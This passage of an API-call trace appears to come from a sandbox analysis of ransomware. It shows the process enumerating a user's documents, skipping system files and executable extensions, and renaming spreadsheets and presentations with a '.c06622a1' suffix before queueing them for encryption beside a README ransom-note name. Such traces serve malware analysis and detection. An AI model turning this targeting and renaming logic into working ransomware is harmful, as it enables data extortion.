"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\bkoj82 w9yyd.ppt.c06622a1"), dwFlags=0x8) returned 1 [0149.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\bkoj82 w9yyd.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x63c [0149.475] CreateIoCompletionPort (FileHandle=0x63c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.475] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4e50020 [0149.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b9ab264 [0149.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1316146 [0149.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4661ac6b [0149.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x676a6a41 [0149.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d2d34b8 [0149.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x373bfc6 [0149.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xeda998f [0149.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46008181 [0149.485] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4e50094, Length=0x80) returned 0xbff41138 [0149.485] RtlComputeCrc32 (PartialCrc=0x1138, Buffer=0x4e50094, Length=0x80) returned 0x22f0de09 [0149.485] RtlComputeCrc32 (PartialCrc=0xde09, Buffer=0x4e50094, Length=0x80) returned 0x1905f348 [0149.485] RtlComputeCrc32 (PartialCrc=0xf348, Buffer=0x4e50094, Length=0x80) returned 0x29d97144 [0149.485] RtlComputeCrc32 (PartialCrc=0x7144, Buffer=0x4e50094, Length=0x80) returned 0x66d68685 [0149.485] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0149.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.485] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa97bede0, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x6ce3b0, ftLastAccessTime.dwHighDateTime=0x1d5e74a, ftLastWriteTime.dwLowDateTime=0x6ce3b0, ftLastWriteTime.dwHighDateTime=0x1d5e74a, nFileSizeHigh=0x0, nFileSizeLow=0x13638, dwReserved0=0x0, dwReserved1=0x0, cFileName="gAO-0Y8QZ7iAYGK7Sja.xlsx", cAlternateFileName="GAO-0Y~1.XLS")) returned 1 [0149.485] _wcsicmp (_Str1="gAO-0Y8QZ7iAYGK7Sja.xlsx", _Str2="README.c06622a1.TXT") returned -11 [0149.485] wcsstr (_Str="gAO-0Y8QZ7iAYGK7Sja.xlsx", _SubStr="README") returned 0x0 [0149.485] _wcsicmp (_Str1="autorun.inf", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned -6 [0149.485] wcslen (_String="autorun.inf") returned 0xb [0149.485] _wcsicmp (_Str1="boot.ini", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned -5 [0149.485] wcslen (_String="boot.ini") returned 0x8 [0149.485] _wcsicmp (_Str1="bootfont.bin", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned -5 [0149.485] wcslen (_String="bootfont.bin") returned 0xc [0149.485] _wcsicmp (_Str1="bootsect.bak", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned -5 [0149.485] wcslen (_String="bootsect.bak") returned 0xc [0149.485] _wcsicmp (_Str1="desktop.ini", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned -3 [0149.486] wcslen (_String="desktop.ini") returned 0xb [0149.486] _wcsicmp (_Str1="iconcache.db", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 2 [0149.486] wcslen (_String="iconcache.db") returned 0xc [0149.486] _wcsicmp (_Str1="ntldr", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 7 [0149.486] wcslen (_String="ntldr") returned 0x5 [0149.486] _wcsicmp (_Str1="ntuser.dat", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 7 [0149.486] wcslen (_String="ntuser.dat") returned 0xa [0149.486] _wcsicmp (_Str1="ntuser.dat.log", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 7 [0149.486] wcslen (_String="ntuser.dat.log") returned 0xe [0149.486] _wcsicmp (_Str1="ntuser.ini", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 7 [0149.486] wcslen (_String="ntuser.ini") returned 0xa [0149.486] _wcsicmp (_Str1="thumbs.db", _Str2="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 13 [0149.486] wcslen (_String="thumbs.db") returned 0x9 [0149.486] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0149.486] wcslen (_String="386") returned 0x3 [0149.486] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0149.486] wcslen (_String="adv") returned 0x3 [0149.486] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0149.486] wcslen (_String="ani") returned 0x3 [0149.486] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0149.486] wcslen (_String="bat") returned 0x3 [0149.486] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0149.486] wcslen (_String="bin") returned 0x3 [0149.486] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0149.486] wcslen (_String="cab") returned 0x3 [0149.486] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0149.487] wcslen (_String="cmd") returned 0x3 [0149.487] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0149.487] wcslen (_String="com") returned 0x3 [0149.487] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0149.487] wcslen (_String="cpl") returned 0x3 [0149.487] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0149.487] wcslen (_String="cur") returned 0x3 [0149.487] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="deskthemepack") returned 0xd [0149.487] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="diagcab") returned 0x7 [0149.487] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="diagcfg") returned 0x7 [0149.487] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="diagpkg") returned 0x7 [0149.487] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="dll") returned 0x3 [0149.487] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0149.487] wcslen (_String="drv") returned 0x3 [0149.487] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0149.487] wcslen (_String="exe") returned 0x3 [0149.487] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0149.487] wcslen (_String="hlp") returned 0x3 [0149.487] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0149.487] wcslen (_String="icl") returned 0x3 [0149.487] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0149.487] wcslen (_String="icns") returned 0x4 [0149.487] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0149.488] wcslen (_String="ico") returned 0x3 [0149.488] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0149.488] wcslen (_String="ics") returned 0x3 [0149.488] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0149.488] wcslen (_String="idx") returned 0x3 [0149.488] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0149.488] wcslen (_String="ldf") returned 0x3 [0149.488] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0149.488] wcslen (_String="lnk") returned 0x3 [0149.488] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="mod") returned 0x3 [0149.488] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="mpa") returned 0x3 [0149.488] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="msc") returned 0x3 [0149.488] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="msp") returned 0x3 [0149.488] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="msstyles") returned 0x8 [0149.488] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0149.488] wcslen (_String="msu") returned 0x3 [0149.488] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0149.488] wcslen (_String="nls") returned 0x3 [0149.488] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0149.488] wcslen (_String="nomedia") returned 0x7 [0149.488] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0149.488] wcslen (_String="ocx") returned 0x3 [0149.488] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0149.489] wcslen (_String="prf") returned 0x3 [0149.489] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0149.489] wcslen (_String="ps1") returned 0x3 [0149.489] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0149.489] wcslen (_String="rom") returned 0x3 [0149.489] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0149.489] wcslen (_String="rtp") returned 0x3 [0149.489] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0149.489] wcslen (_String="scr") returned 0x3 [0149.489] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0149.489] wcslen (_String="shs") returned 0x3 [0149.489] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0149.489] wcslen (_String="spl") returned 0x3 [0149.489] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0149.489] wcslen (_String="sys") returned 0x3 [0149.489] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0149.489] wcslen (_String="theme") returned 0x5 [0149.489] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0149.489] wcslen (_String="themepack") returned 0x9 [0149.489] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0149.489] wcslen (_String="wpx") returned 0x3 [0149.489] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0149.489] wcslen (_String="lock") returned 0x4 [0149.489] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0149.489] wcslen (_String="key") returned 0x3 [0149.489] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0149.489] wcslen (_String="hta") returned 0x3 [0149.489] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0149.490] wcslen (_String="msi") returned 0x3 [0149.490] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0149.490] wcslen (_String="pdb") returned 0x3 [0149.490] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0149.490] wcslen (_String="sql") returned 0x3 [0149.490] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0149.490] wcslen (_String="sqlite") returned 0x6 [0149.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.490] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.490] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.490] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.490] wcscpy (in: _Dest=0x4530132, _Source="gAO-0Y8QZ7iAYGK7Sja.xlsx" | out: _Dest="gAO-0Y8QZ7iAYGK7Sja.xlsx") returned="gAO-0Y8QZ7iAYGK7Sja.xlsx" [0149.490] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx", dwFileAttributes=0x80) returned 1 [0149.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gao-0y8qz7iaygk7sja.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0149.490] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.490] ReadFile (in: hFile=0x620, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.492] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xf2647a83 [0149.492] RtlComputeCrc32 (PartialCrc=0x7a83, Buffer=0x3fe674, Length=0x80) returned 0xd5a50172 [0149.492] RtlComputeCrc32 (PartialCrc=0x172, Buffer=0x3fe674, Length=0x80) returned 0x6ac683cd [0149.492] RtlComputeCrc32 (PartialCrc=0x83cd, Buffer=0x3fe674, Length=0x80) returned 0x81336553 [0149.492] RtlComputeCrc32 (PartialCrc=0x6553, Buffer=0x3fe674, Length=0x80) returned 0xf30a6443 [0149.492] CloseHandle (hObject=0x620) returned 1 [0149.492] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.492] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx" [0149.492] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx") returned 0x5d [0149.492] wcscpy (in: _Dest=0x454016a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.492] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gao-0y8qz7iaygk7sja.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gao-0y8qz7iaygk7sja.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0149.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gAO-0Y8QZ7iAYGK7Sja.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gao-0y8qz7iaygk7sja.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0149.495] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.495] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ee0020 [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x604b1eaf [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64084f5b [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6efcafc9 [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d153fbf [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fe4be4c [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3514b63c [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76e291d8 [0149.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50aca430 [0149.505] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ee0094, Length=0x80) returned 0x8862be7f [0149.505] RtlComputeCrc32 (PartialCrc=0xbe7f, Buffer=0x4ee0094, Length=0x80) returned 0x52205828 [0149.505] RtlComputeCrc32 (PartialCrc=0x5828, Buffer=0x4ee0094, Length=0x80) returned 0x47aff5f8 [0149.505] RtlComputeCrc32 (PartialCrc=0xf5f8, Buffer=0x4ee0094, Length=0x80) returned 0x3e92596 [0149.505] RtlComputeCrc32 (PartialCrc=0x2596, Buffer=0x4ee0094, Length=0x80) returned 0x87fcef4c [0149.505] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0149.505] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.505] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.505] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b0ae30, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xd69a93a0, ftLastAccessTime.dwHighDateTime=0x1d5e40d, ftLastWriteTime.dwLowDateTime=0xd69a93a0, ftLastWriteTime.dwHighDateTime=0x1d5e40d, nFileSizeHigh=0x0, nFileSizeLow=0x1605c, dwReserved0=0x0, dwReserved1=0x0, cFileName="gfpSs.xls", cAlternateFileName="")) returned 1 [0149.505] _wcsicmp (_Str1="gfpSs.xls", _Str2="README.c06622a1.TXT") returned -11 [0149.505] wcsstr (_Str="gfpSs.xls", _SubStr="README") returned 0x0 [0149.505] _wcsicmp (_Str1="autorun.inf", _Str2="gfpSs.xls") returned -6 [0149.506] wcslen (_String="autorun.inf") returned 0xb [0149.506] _wcsicmp (_Str1="boot.ini", _Str2="gfpSs.xls") returned -5 [0149.506] wcslen (_String="boot.ini") returned 0x8 [0149.506] _wcsicmp (_Str1="bootfont.bin", _Str2="gfpSs.xls") returned -5 [0149.506] wcslen (_String="bootfont.bin") returned 0xc [0149.506] _wcsicmp (_Str1="bootsect.bak", _Str2="gfpSs.xls") returned -5 [0149.506] wcslen (_String="bootsect.bak") returned 0xc [0149.506] _wcsicmp (_Str1="desktop.ini", _Str2="gfpSs.xls") returned -3 [0149.506] wcslen (_String="desktop.ini") returned 0xb [0149.506] _wcsicmp (_Str1="iconcache.db", _Str2="gfpSs.xls") returned 2 [0149.506] wcslen (_String="iconcache.db") returned 0xc [0149.506] _wcsicmp (_Str1="ntldr", _Str2="gfpSs.xls") returned 7 [0149.506] wcslen (_String="ntldr") returned 0x5 [0149.506] _wcsicmp (_Str1="ntuser.dat", _Str2="gfpSs.xls") returned 7 [0149.506] wcslen (_String="ntuser.dat") returned 0xa [0149.506] _wcsicmp (_Str1="ntuser.dat.log", _Str2="gfpSs.xls") returned 7 [0149.506] wcslen (_String="ntuser.dat.log") returned 0xe [0149.506] _wcsicmp (_Str1="ntuser.ini", _Str2="gfpSs.xls") returned 7 [0149.506] wcslen (_String="ntuser.ini") returned 0xa [0149.506] _wcsicmp (_Str1="thumbs.db", _Str2="gfpSs.xls") returned 13 [0149.506] wcslen (_String="thumbs.db") returned 0x9 [0149.506] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0149.506] wcslen (_String="386") returned 0x3 [0149.506] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0149.506] wcslen (_String="adv") returned 0x3 [0149.506] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0149.507] wcslen (_String="ani") returned 0x3 [0149.507] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0149.507] wcslen (_String="bat") returned 0x3 [0149.507] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0149.507] wcslen (_String="bin") returned 0x3 [0149.507] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0149.507] wcslen (_String="cab") returned 0x3 [0149.507] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0149.507] wcslen (_String="cmd") returned 0x3 [0149.507] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0149.507] wcslen (_String="com") returned 0x3 [0149.507] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0149.507] wcslen (_String="cpl") returned 0x3 [0149.507] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0149.507] wcslen (_String="cur") returned 0x3 [0149.507] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0149.507] wcslen (_String="deskthemepack") returned 0xd [0149.507] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0149.507] wcslen (_String="diagcab") returned 0x7 [0149.507] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0149.507] wcslen (_String="diagcfg") returned 0x7 [0149.507] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0149.507] wcslen (_String="diagpkg") returned 0x7 [0149.507] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0149.507] wcslen (_String="dll") returned 0x3 [0149.508] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 [0149.508] wcslen (_String="drv") returned 0x3 [0149.508] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0149.508] wcslen (_String="exe") returned 0x3 [0149.508] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0149.508] wcslen (_String="hlp") returned 0x3 [0149.508] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0149.508] wcslen (_String="icl") returned 0x3 [0149.508] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0149.508] wcslen (_String="icns") returned 0x4 [0149.508] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0149.508] wcslen (_String="ico") returned 0x3 [0149.508] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0149.508] wcslen (_String="ics") returned 0x3 [0149.508] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0149.508] wcslen (_String="idx") returned 0x3 [0149.508] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0149.508] wcslen (_String="ldf") returned 0x3 [0149.508] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0149.508] wcslen (_String="lnk") returned 0x3 [0149.508] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0149.508] wcslen (_String="mod") returned 0x3 [0149.508] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0149.509] wcslen (_String="mpa") returned 0x3 [0149.509] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0149.509] wcslen (_String="msc") returned 0x3 [0149.509] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0149.509] wcslen (_String="msp") returned 0x3 [0149.509] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0149.509] wcslen (_String="msstyles") returned 0x8 [0149.509] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0149.509] wcslen (_String="msu") returned 0x3 [0149.509] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0149.509] wcslen (_String="nls") returned 0x3 [0149.509] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0149.509] wcslen (_String="nomedia") returned 0x7 [0149.509] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0149.509] wcslen (_String="ocx") returned 0x3 [0149.509] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0149.509] wcslen (_String="prf") returned 0x3 [0149.509] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0149.509] wcslen (_String="ps1") returned 0x3 [0149.509] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0149.509] wcslen (_String="rom") returned 0x3 [0149.510] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0149.510] wcslen (_String="rtp") returned 0x3 [0149.510] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0149.510] wcslen (_String="scr") returned 0x3 [0149.510] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0149.510] wcslen (_String="shs") returned 0x3 [0149.510] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0149.510] wcslen (_String="spl") returned 0x3 [0149.510] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0149.510] wcslen (_String="sys") returned 0x3 [0149.510] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0149.510] wcslen (_String="theme") returned 0x5 [0149.510] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0149.510] wcslen (_String="themepack") returned 0x9 [0149.510] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0149.510] wcslen (_String="wpx") returned 0x3 [0149.510] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0149.510] wcslen (_String="lock") returned 0x4 [0149.510] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0149.510] wcslen (_String="key") returned 0x3 [0149.510] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0149.510] wcslen (_String="hta") returned 0x3 [0149.511] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0149.511] wcslen (_String="msi") returned 0x3 [0149.511] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0149.511] wcslen (_String="pdb") returned 0x3 [0149.511] _wcsicmp (_Str1="sql", _Str2="xls") returned -5 [0149.511] wcslen (_String="sql") returned 0x3 [0149.511] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0149.511] wcslen (_String="sqlite") returned 0x6 [0149.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.511] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.511] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.511] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.511] wcscpy (in: _Dest=0x4530132, _Source="gfpSs.xls" | out: _Dest="gfpSs.xls") returned="gfpSs.xls" [0149.511] SetFileAttributesW 